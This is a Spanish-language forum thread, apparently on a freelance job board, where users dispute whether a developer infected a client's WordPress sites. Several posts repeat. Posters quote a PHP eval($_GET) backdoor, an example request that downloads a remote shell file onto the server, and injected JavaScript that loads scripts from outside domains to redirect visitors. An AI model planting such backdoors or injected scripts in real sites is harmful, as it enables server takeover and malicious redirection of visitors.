🔒 Este tema está cerrado para nuevas respuestas.
⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.
la web esa a donde redireccionaba tu sitio tambien fue hackeada... es mas si miras el codigo fuente de la pagina tiene inyectado un JS para redireccionar y ese archivo que esta subido en la carpeta uploads no tiene que estar ahi.. por lo que fuiste hackeado... no tiene nada que ver kanikase...
Estoy de acuerdo con Raigor.
Al margen del problema de seguridad (que esperemos se aclare pronto), desde ya kanikase incumple con los tiempos estipulados.
El código tuvo que haber salido de algún lado, sea de la mano de kanikaze o sea de la mano de alguien más (recomiendo revisar desde el origen de los plugins hasta todas las personas que han tenido acceso a los sitios).
Otro detalle, es muy fácil decir "yo no fui" y llamar a todos mis clientes a defenderme.
Saludos cordiales.
Estoy de acuerdo con Raigor.
Al margen del problema de seguridad (que esperemos se aclare pronto), desde ya kanikase incumple con los tiempos estipulados.
El código tuvo que haber salido de algún lado, sea de la mano de kanikaze o sea de la mano de alguien más (recomiendo revisar desde el origen de los plugins hasta todas las personas que han tenido acceso a los sitios).
Otro detalle, es muy fácil decir "yo no fui" y llamar a todos mis clientes a defenderme.
Saludos cordiales.
Creo que no hay mas nada que hablar. Hablo cicklowBueno espero que con lo que puso cicklow quede claro que no fui.
Y si no, como ya dije, puedo dar acceso a mis cuentas.
Desde un principio la calificación estuvo mal colocada, pues no puede calificarte por "envirar" sus sitios web. 😕 O al menos debería demostrarlo con pruebas contundentes y no con suposiciones y con fragmentos de códigos.
Muy mal por su servidor que no guarda log's de conexión a panel y esas cosas normales.
Yo en lo particular no entendí muy bien tu mensaje [MENTION=9679]cicklow[/MENTION] si pudieras detallarlo mas para que quede 100% claro seria de gran ayudar.
<?
eval($_GET['e']);
?>www.sitio.com/archivoinfectado.php?e=file_put_contents('virus.php',file_get_contents('http://www.otrositio.com/shell.txt'));Por qué hacerlo sino? Acá fueron pocos los que comentaron de manera imparcial.Llamar a todos mis clientes? :distant::distant::distant::distant::distant::distant: bien, acepto que le platiqué a dos users lo sucedido, pero si comenta un user con el que he hecho negocio es porque lo llamé? :welcoming::welcoming::welcoming::witless:
Interesante postura ofensiva, doder10. No, no he trabajado con tnc05. Si lees atentamente, si bien estoy de su lado, también comento la posibilidad de que el hackeo tuviera otro origen.o llamar a todos los amigos con los que tal vez me reunido a que afirmen que fue kanikase :encouragement:
[MENTION=81006]kanikase[/MENTION] ... esa carpeta la crea WP por cada subida de archivos... por lo que esa carpeta ya fue creada y luego han hackeado el sitio y subido el archivo... lo hacen asi para que no se den cuenta de que fueron infectados... quien vaa buscar en la carpeta uploadas la cual hay solo imagenes un html... nadie...Y otra prueba, el archivo ese del anuncio fue subido desde el año pasado, ¿desde entonces tenía pensado infectar tu web?
my-dairyman.com/wp-content/uploads/2015/10/image.html
viernes, 10 de junio de 2016 02:31:09 p.m.Por qué hacerlo sino? Acá fueron pocos los que comentaron de manera imparcial.
Te pasaste todo este tema intentando desvirtuarlo a más no poder y no es un detalle menor..
Interesante postura ofensiva, doder10. No, no he trabajado con tnc05. Si lees atentamente, si bien estoy de su lado, también comento la posibilidad de que el hackeo tuviera otro origen.
Por qué hacerlo sino? Acá fueron pocos los que comentaron de manera imparcial.
Te pasaste todo este tema intentando desvirtuarlo a más no poder y no es un detalle menor..
Interesante postura ofensiva, doder10. No, no he trabajado con tnc05. Si lees atentamente, si bien estoy de su lado, también comento la posibilidad de que el hackeo tuviera otro origen.
<script type="text/javascript"> var _prvar=_prvar||new Object(); (function(pa,s){if(document.getElementById('pr48960776'))return false; pa=document.createElement('script');pa.type='text/javascript';pa.async=true;pa.id='pr48960776';pa.src='//prscripts.com/pub.js'; s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(pa,s);})();document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://a.c'+'0594.com/?js=14"></'+'scr'+'ipt>');</script>
</head>opt/php-7.0.3/lib/php') in /var/www/clients/client2/web2/web/wp-settings.php on ... Fatal error: Uncaught Error: Call to a member function register_handler() on ...
Fue lo que insinuaste, mencioné lo del trabajo ya que esto es un foro-bolsa-de-trabajo, hace falta aclarar?nadie te dijo que conocieras o trabajaras con tnc05...si lees atentamente :encouragement:
Cierto, cicklow ya dejó todo claro, ese es un dominio chino, el código que puso cicklow imprime otro JS (http://a.c0594.com/?js=14), y ese es el que redirecciona a a.c0594.com/?tz=14, luego es redirecciona a my-dairyman.com/wp-content/uploads/2015/10/image.html
Ya está todo claro, espero que me retiren la negativa. 🙂
🔒 Este tema está cerrado para nuevas respuestas.
⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?